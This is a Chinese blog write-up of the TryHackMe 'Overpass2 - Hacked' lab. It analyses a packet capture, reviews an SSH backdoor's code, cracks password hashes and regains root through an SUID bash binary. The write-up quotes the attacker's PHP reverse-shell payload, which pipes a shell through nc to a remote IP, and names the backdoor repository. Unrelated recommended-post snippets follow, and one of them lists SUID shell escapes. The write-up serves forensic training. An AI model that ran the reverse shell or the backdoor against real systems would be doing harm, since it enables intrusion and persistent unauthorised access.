TryHackMe | Overpass2- Hacked | Writeup

最新推荐文章于 2025-06-22 16:20:21 发布
原创 最新推荐文章于 2025-06-22 16:20:21 发布 · 890 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #http #网络安全 #网络协议 #笔记 #wireshark

Overpass2 - Hacked

取证 – 分析 PCAP

首先要找到上传反向 shell 的页面 URL,这里先过滤了 HTTP 数据包

很容易就看到了几个 POST 请求,上传的路径是 upload 路径,这里追踪那个 POST 数据包的 HTTP 流,进一步查看

可以看到他在 development 的 upload.php 下传入了一个 payload.php 的文件,内容就是一个反向的 shell

What was the URL of the page they used to upload a reverse shell?

/development/

What payload did the attacker use to gain access?

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

接下来是找攻击者利用反向 shell 实现的攻击,这里先过滤出攻击者的数据包,使用 ip.dst == 192.168.170.145

可以看到除了前面的几个 HTTP 的数据包.后面就是 TCP 的数据包,可能是连接上了 shell,这里点击一个 TCP 数据包之后,进行追踪 TCP 流

可以看到就是 Linux 命令,发现攻击者使用 su 切换到 james 用户身份,也看到使用的密码

What password did the attacker use to privesc?

whenevernoteartinstant

向下看,找到攻击者使用 git 命令从 GitHub 中下载了一个后门,设置了一个 ssh 连接

How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

最后要找到系统密码的破解,可以看到攻击者 cat 过 shadow 文件

这里我们可以看到最后五个用户的密码和用户名,使用 john 进行破解,破解的文件要只需要留下用户名和后面的 hash 值,hash 值的 : 后面的都需要删除掉

这里可以看出破解出四个用户的系统密码

研究 – 分析代码

这里需要分析后门的程序代码,我们可以到 GitHub 的地址中找到利用的后门程序

这个代码是自定义的一个带有密码的 SSH 服务器,使用正确的密码经过(SHA512 加盐哈希对比)才可以是实现登录

默认的哈希值在开头使用变量定义好了

在最后的函数中我们也找到盐的值

之前追踪 TCP 流中,可以看到使用的哈希值,这是使用 a 参数来设置了程序的哈希值,也就是后面登录时的校验密码

使用 hash:salt的格式来写入 hash.txt,然后使用 hashcat 进行破解, hashcat -m 1710 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force,也就可以拿到后门的密码了

进攻 – 回来

这里首先使用 nmap 对于目标端口进行扫描

进入 80 端口的 web 页面发现已经被挂了黑页

这里也发现了 2222 端口开放着,就利用之前破解的密码进行登录,注意要加上 -oHostKeyAlgorithms=+ssh-rsa,登录之后可以在 james 的根目录下找到 flag

这里使用 ls -al查看一下根目录下文件,发现一个 suid 的 .suid_hash文件,运行之后发现是给了一个终端,就是 bash 文件的效果,在https://gtfobins.github.io/gtfobins/bash/#suid进行了搜索,发现加上 -p参数运行就可以拿到 root 权限

最后在/root 目录下找到根 flag

THM靶机overpass2-hacked流量分析溯源初体验
weixin_43738494的博客
06-23 281
发现其中有命令执行,推测是一个反弹shell,未加密,所以不太可能是msf或者其它c2的shell,只是一个普通的nc shell或者bash shell。会发现所有密码均已经失效,狡猾的hacker修改了所有的密码。进去之后会发现james的密码已经失效了,ssh的密码和原来的旧密码都没有用,所以这时候需要尝试横向一下。在下面发现对方使用的hash,破解这个hash就可以得到对方的常用(?看到最后一行的 /home/james/.suid_bash,相当可疑。
tryhackme-Cyber Security 101-Linux Shells(linux命令框)
2301_79096184的博客
12-24 791
作为操作系统的常规用户,我们都广泛使用图形用户界面 (GUI) 来执行大多数操作。只需点击几下不同的选项,您的任务就完成了。但是,您可以通过在操作系统的 CLI 中编写命令而不是使用 GUI 来执行几乎所有任务。shell 为您在 CLI 中编写的命令提供了一些很棒的功能。这种与 OS 交互的方式更高效且对资源更友好。假设您在一家餐厅,您的食物有两种选择。第一种选择是从菜单中点餐,服务员会上菜。第二种选择是在厨房里自己做你想要的菜。
THM 靶场 — Overpass-writeup
2401_83799022的博客
12-13 1015
在定时任务中,可以发现一个以 root 用户 curl 网站目录下的一个 bash 脚本 并且执行。在关于我们的页面下有一些员工的名字,可暂时保存下来。需要在目标主机中 cp bash,接着在我们挂载的本机目录中进行赋予权限。那么我们可以尝试接口转发,让本地的某个端口,被转发到远程服务器上。在上面我们得知了密码,但不知道是谁的密码,甚至不知道是哪个服务的。这个页面是关于这个网站发布的软件的一些下载。在上题的流中,最下面使用了 git ,下载了一个文件。但是现在我们是 www 用户,我们需要一个真正的用户。
docker-overpass-api:Docker Overpass API
05-25
docker-overpass-api 适用于OpenStreetMap Docker。 构建Docker映像 下载以bzip格式压缩的XML格式的OSM文件,并另存为planet.osm.bz2 。 是一个很好的资源。 curl -o planet.osm.bz2 ...
overpass-api和overpass-turbo安装(ubuntu16.04)
蓝蓝的天
10-25 2610
overpass-api和overpass-turbo安装 介绍 overpass-api安装 overpass-turbo安装 问题记录 介绍overpass-api用于查询openstreemap的node,way和area,官网的overpass-api访问较慢,所以选择装在自己电脑上,安装需要的存储空间比较大,最少几十G。overpass-api安装安装步骤参考官网http://wiki.o
Python库 | helper-mapilio-1.0.3.tar.gz
03-06
可能支持常见的GIS数据格式如Shapefile、GeoJSON、KML,也可能提供与地图服务接口交互的能力,比如Google Maps API、OpenStreetMap的Overpass API等。 在实际应用中,开发者可以利用这样的库来创建地图应用、进行...
overpass-api 部署(docker)
CodeStar`
06-03 927
Overpass是一个用于访问和查询OpenStreetMap(OSM)数据的开放式数据API和查询语言。OpenStreetMap是一个由社区驱动的免费开放地图项目,用户可以贡献地理数据并使用它来创建自由和开放的地图。Overpass API提供了一种强大的方式来获取和筛选OpenStreetMap数据。它允许用户根据各种条件和过滤器来执行高级查询,并返回符合查询条件的地理数据。通过Overpass API,用户可以按照地理位置、特定标签、区域范围等多种方式来查询OpenStreetMap数据。
overpass-layer:通过OverpassFrontend使用来自Overpass API的OpenStreetMap数据显示一个Leaflet层
05-06
var overpassFrontend = new OverpassFrontend ( '//overpass-api.de/api/interpreter' ) // Create the layer var layer = new OverpassLayer ( { query : 'nwr[building]' , minZoom : 16 , feature : { title...
求助帖:学Java开发方向还是网络安全方向前景好
2301_81860883的博客
06-20 574
而且听了他们说的话,我好像感觉我确实对Java开发敲代码之类的不怎么感兴趣(我的数学很差);最近网络安全被一个培训机构吹得天花乱坠,虽然他家既有网安又有java和UI,我也是学软件工程的(山西某211,此机构是每年和我们学校合作的校企公司),但那里的老师仍然大力推荐我学网络安全(渗透、代码审计)。但是我现在正值大二升大三的暑假(暑假在北京混个Java开发岗,这个学期自学了Java但是效果不好),要学网安从9月学起要学一年,每周末上一整天课,报名费2w保就业,现在交了500的预科费,倒是可以退,
SSL安全证书:数字时代的网络安全基石
qwerdfwc_的博客
06-18 379
SSL安全证书不仅是技术工具,更是企业数字化转型的“安全基石”。在网络安全威胁日益复杂的今天,选择合适的SSL证书、合理配置加密策略、定期更新证书,已成为企业保障数据安全、提升用户信任、满足合规要求的必然选择。未来,随着技术的不断演进,SSL证书将在更广泛的领域发挥关键作用,为数字世界的繁荣发展保驾护航。
HVV工具推荐︱风险情报预警驱动,云鲨RASP助力攻防从“被动防御”到“共生免疫”
软件供应链安全选型指南
06-18 772
同时,通过不断迭代的防护策略,悬镜云鲨RASP至今帮助企业发现了数百万次的威胁攻击,对威胁攻击进行了告警、阻断等处理,大大降低了企业面临的网络攻击威胁。同时,云鲨RASP全面接入悬镜云脉XSBOM,依托悬镜安全团队强大的供应链管理监测能力和AI安全大数据云端分析能力,实时监控和分析全球数字供应链风险情报,及时获取断供、投毒、许可证变更新信息,自动识别组件和供应商的潜在安全风险,并精准预警可疑活动和新出现的威胁,结合企业组件资产地图,精准推送风险预警消息的同时生成相关热修复补丁,保障线上数字资产安全
SD-WAN 不是“裸跑”:聊聊怎么把网络安全绑在智能网关上
Echo_Wish
06-21 71
这些年,“SD-WAN”这个词火得不行,听上去高大上,像“云原生网络”、“下一代 WAN 技术”、“运维降本神器”,厂商的 PPT 一个比一个能吹。
网络安全应急响应实战笔记
鹿鸣天涯
06-22 531
网络安全应急响应实战笔记GitHub 地址:https://github.com/Bypass007/Emergency-Response-NotesGitBook 地址:前言 · 应急响应实战笔记
网络安全之任意文件读取利用
anquan2233的博客
06-17 703
刚好最近一大批漏洞都爆出来了,比如Kubernetes Ingress-Nginx Admission Controller RCE Escalation,是危害性极大的高危漏洞,在内网渗透中能直接击穿K8S集群。这些高危漏洞其实分析文章很多,看国内外众多大佬的分析都非常精彩,这里我也不献丑了。但引起我关注的漏洞是Vite Development Server Arbitrary File Read 这个任意文件读取漏洞。
最高网络安全标准,追觅扫地机获UL Solutions钻石级安全认证
weixin_43735236的博客
06-19 375
以全球领先的安全隐私标准及全球领先的测试方法,建立起安全基线,不断为消费者打造更安全可靠的智能终端产品。此次追觅扫地机获得钻石级认证,意味着其在设备端的安全防护,应用层的数据加密,云服务数据存储的安全管理的通讯链路体系均通过了极为严苛的审核与验证。日前,追觅X50系列扫地机获得全球应用安全科学专家 UL Solutions 颁发的「UL Solutions钻石级网络安全验证证书」,这一认证意味着追觅扫地机在网络安全领域满足了极为严苛的国际标准,为用户的数据安全与隐私保护筑起了可靠防线。
网络安全智能体:重塑重大赛事安全保障新范式
最新发布
tigerman20201的博客
06-22 378
2025年亚冬会期间,安恒信息基于安全智能体开发平台(如图1所示),以恒脑安全垂域大模型为底座,设计部署10个亚冬会专属智能体(数据安全风险评估智能体、场馆安全风险分析智能体、主机异常行为分析智能体、AI告警研判智能体、恶意IOC查询智能体、恶意IOC拓线智能体、安全情报分析智能体、恶意文件分析智能体、亚冬小恒智聊智能体、场馆安全检查助手),为亚冬会网络安全提供了丰富且专业的技术保障。三是智能分析与决策。在此基础上,网络安全智能体根据预设的规则和策略,还可自动作出决策,生成相应的处置建议。
网络安全行业人才缺口与就业困境的多维解析
Gappsong874的博客
06-21 365
高校课程滞后:许多高校的网络安全课程仍沿用十年前的教材,重理论轻实践,学生缺乏实战能力(如渗透测试、漏洞挖掘等),而企业需要的是能直接解决实际问题的技术人才。师资缺乏实战经验:部分高校教师自身缺乏企业级攻防经验,难以培养符合市场需求的人才。自学资源有限:虽然网上有大量免费教程,但大多仅涵盖基础知识,难以支撑求职所需的技能水平。“即插即用”用人观念:许多企业希望招聘有实战经验的人才,但不愿投入资源培养新人,导致应届生和转行者难以进入行业。偏好内推和机构合作:部分企业更倾向于从专业培训机构或内部推荐渠道招聘,而
网络安全之Linux提权由浅入深
anquan2233的博客
06-20 720
sh 拿到 root shell/usr/bin/python 或 python3:使用 os.system("/bin/sh") 或 subprocess 模块执行命令/usr/bin/perl:使用 system("/bin/sh") 拿 shell/usr/bin/env:可用 env /bin/sh 方式执行 shell/usr/bin/bash:如果带有 SUID,可直接提权执行 /bin/bash -p。在 Linux 系统中,一切皆文件,包括普通文件、目录、设备文件、套接字等。
Overpass Turbo
01-23
### Overpass Turbo 使用指南 #### 了解 Overpass Turbo 的基本概念 Overpass Turbo 提供了一个直观的 Web 界面,使用户能够在不需要编程技能的情况下构建和执行复杂的 Overpass 查询[^2]。这使得无论是初学者还是高级用户都能方便地测试查询、查看结果以及导出所需的数据。 #### 构建第一个查询 为了快速入门,可以从简单的查询开始学习如何使用 Overpass Turbo 进行地理空间数据分析: 1. 打开 [Overpass Turbo](https://overpass-turbo.eu/) 并点击页面中央的地图区域来设置边界框。 2. 输入如下所示的基础查询语句以检索特定类型的对象: ```plaintext node["amenity"="cafe"](around:500); out body; ``` 此查询将在地图中心位置周围半径500米范围内查找所有的咖啡馆节点,并显示它们的信息。 #### 利用高级特性优化查询效率 对于更复杂的需求,可以利用一些特有的功能提高查询性能与灵活性。例如,在长时间运行的任务中可设定超时参数防止请求被意外中断[^3]: ```plaintext [out:csv(::id, ::lat, ::lon, name; true; ",")][timeout:60]; node(around:1000)["shop"]; out skel qt; ``` 这段代码不仅设置了最大等待时间为60秒,还指定了输出格式为CSV表格形式,便于后续分析处理。 #### 结合其他工具扩展应用场景 除了直接操作 OSM 原始数据外,还可以借助第三方库如 `osmtogeojson` 将其转化为更加通用的空间矢量格式——GeoJSON,从而更好地服务于各类 GIS 应用场景中的展示需求[^4]: ```javascript const osmtogeojson = require('osmtogeojson'); // Assume 'data' contains valid OSM XML content fetched via API or file upload. let geojsonData = osmtogeojson(data); console.log(JSON.stringify(geojsonData)); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值